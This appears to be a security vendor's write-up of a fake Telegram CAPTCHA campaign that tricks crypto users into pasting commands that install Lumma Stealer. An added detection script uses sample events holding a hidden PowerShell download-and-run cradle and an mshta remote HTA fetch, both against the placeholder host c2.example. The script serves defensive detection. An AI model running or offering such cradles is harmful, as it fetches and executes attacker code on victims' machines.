Cybercriminals are continuously evolving their tactics to exploit human behavior and trust. In one of the latest campaigns, attackers have weaponized fake CAPTCHA verification systems—tools typically used to verify a user’s legitimacy—to deliver malicious payloads.
Introduction
This campaign demonstrates an evolution from basic fake URL-based CAPTCHAs, seen in previous attacks, to a more sophisticated Telegram-based approach. The primary targets are cryptocurrency communities, where unsuspecting users are deceived into executing malicious scripts. This novel tactic highlights the rapid innovation and adaptability of cybercriminals in delivering malware.
Infection Chain
The infection chain begins on the X platform (formerly Twitter), where attackers hijack legitimate threads, enticing users to join Telegram groups and channels under the guise of helpful discussions.
Once inside these channels, victims are prompted to complete a CAPTCHA verification using a bot designed to mimic “Safeguard” – a popular Telegram bot used for user validation. This process ultimately leads to the deployment of the Lumma Stealer malware via multiple loaders, including the IDAT Loader (also known as Hijack Loader) and the Emmenthal Loader.
Hijacking Threads on X Platform
Threat actors exploit the X platform to infiltrate legitimate threads within the cryptocurrency community. By impersonating verified accounts or creating accounts with deceptive names and avatars that closely resemble the original poster, these actors strategically reply to popular posts from genuine crypto influencers. Their comments mimic the tone and content of the original thread, giving the appearance of helpful contributions to the discussion. Embedded within these replies are links directing users to Telegram groups and channels, setting the stage for the next phase of the attack.
Fake CAPTCHA via Telegram Mini Apps
When victims click on the Telegram link, they are presented with a post asking them to verify their identity using a fake Safeguard bot.
Clicking on the Tap to Verify button leads to a fake Telegram bot with a handle resembling legitimate Safeguard variations, such as:
OfficiaISafeguardRobot
SafeguardsAuthenticationBot
Safeguardsauthbot
SafeguardOfficiaIRobot
Safeguard_Officialbot
Based on the victim’s device, the bot tailors its behavior:
- Mobile Devices: A message is displayed stating that verification is not supported on mobile devices.
- Mac Machines: A command line is executed, delivering the Atomic Stealer malware.
- Windows Machines: The bot simulates a verification process by displaying a fake CAPTCHA that always fails, regardless of the victim’s input. It then suggests an “alternative verification method,” copying a malicious command to the victim’s clipboard and instructing them to execute it manually. Additionally, the bot sends an infection notification back to the attacker.
Clipboard Command
During the attack, two distinct loaders are observed, both delivering the same final payload: the IDAT Loader (also known as the Hijack Loader) and the Emmenthal Loader.
IDAT Loader
The malicious command copied to the victim’s clipboard fetches a second-stage PowerShell script from the attacker’s Command and Control (C2) server and executes it.
- The second-stage script sends a POST request to the C2 endpoint /sendNotification.php, containing the message “PowerShell script executed successfully.”
- Following this, the script downloads a ZIP archive, extracts its contents, and executes it. The extracted content is the Hijack Loader, which ends up loading the final payload – Lumma Stealer.
Emmenthal Loader
The Emmenthal Loader begins its execution by leveraging mshta.exe to retrieve and execute an HTA file from the C2 server.
The HTA file includes a large binary blob with the script to be executed embedded in the middle of it, inside <script> tags. While these <script> tags are filled with junk code, the script that is finally extracted and executed is six lines of JavaScript. This script constructs the next-stage payload by decoding an obfuscated string blob embedded at the beginning of the HTA file.
This JavaScript code executes heavily obfuscated PowerShell scripts in memory, ultimately delivering and executing the final payload – Lumma Stealer.
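A starting point for catching both entry vectors described above on the endpoint, as an added example that is not Morphisec's code or tooling: it classifies process-creation events, flagging an explorer.exe-parented PowerShell download cradle (the clipboard command pasted into the Run dialog, as in the IDAT Loader chain) and mshta.exe fetching a remote HTA (the Emmenthal Loader chain). The event records and the domain c2.example are constructed placeholders, not indicators from the report.

```python
import re

# Constructed sample process-creation events (not taken from the report). Each record
# carries the parent image, the child image and its command line, as an EDR or Sysmon
# event 1 would. The first two mirror the chain described above; the third is benign.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm http://c2.example/stage2.ps1)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://c2.example/verify.hta"},
    {"parent": r"C:\Program Files\Vendor\updater.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\inventory.ps1"},
]

# Tokens that turn a PowerShell one-liner into a download-and-execute cradle.
CRADLE = re.compile(r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|"
                    r"invoke-webrequest|downloadstring)\b", re.I)
REMOTE = re.compile(r"https?://", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+h(idden)?\b|-enc", re.I)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev: dict) -> list[str]:
    """Return the names of the rules the event matches (empty list if none)."""
    hits = []
    child, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    # Emmenthal-style entry: mshta.exe pulling an HTA straight from a URL.
    if child == "mshta.exe" and REMOTE.search(cmd):
        hits.append("mshta_remote_hta")
    # IDAT-style entry: PowerShell fetching and running remote code, launched from the
    # shell (a clipboard command pasted into the Run dialog keeps explorer.exe as parent)
    # or trying to stay out of sight with a hidden window / encoded command.
    if child in ("powershell.exe", "pwsh.exe") and CRADLE.search(cmd) and REMOTE.search(cmd):
        if parent == "explorer.exe" or HIDDEN.search(cmd):
            hits.append("shell_spawned_ps_download_cradle")
    return hits

def scan(events: list[dict]) -> list[tuple[str, str]]:
    """Pair every matching rule with the command line that triggered it."""
    return [(rule, ev["cmdline"]) for ev in events for rule in classify(ev)]

if __name__ == "__main__":
    for rule, cmd in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```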
How Morphisec Can Help
Morphisec’s Automated Moving Target Defense (AMTD) technology proactively disrupts attacks with attack surface randomization — AMTD dynamically reshapes application memory, eliminating the framework attackers rely on. Morphisec preemptively neutralizes attacks at the earliest stage (including Lumma Stealer malware and other loaders), preventing any impact on the environment.
With its ultra-lightweight agent, Morphisec prevents unknown attacks and advanced threats while providing unprecedented visibility, requiring no prior knowledge of signatures, behavioral patterns, or indicators of attacks (IoAs).
Schedule a demo today to see how Morphisec stops advanced campaigns and emerging threats.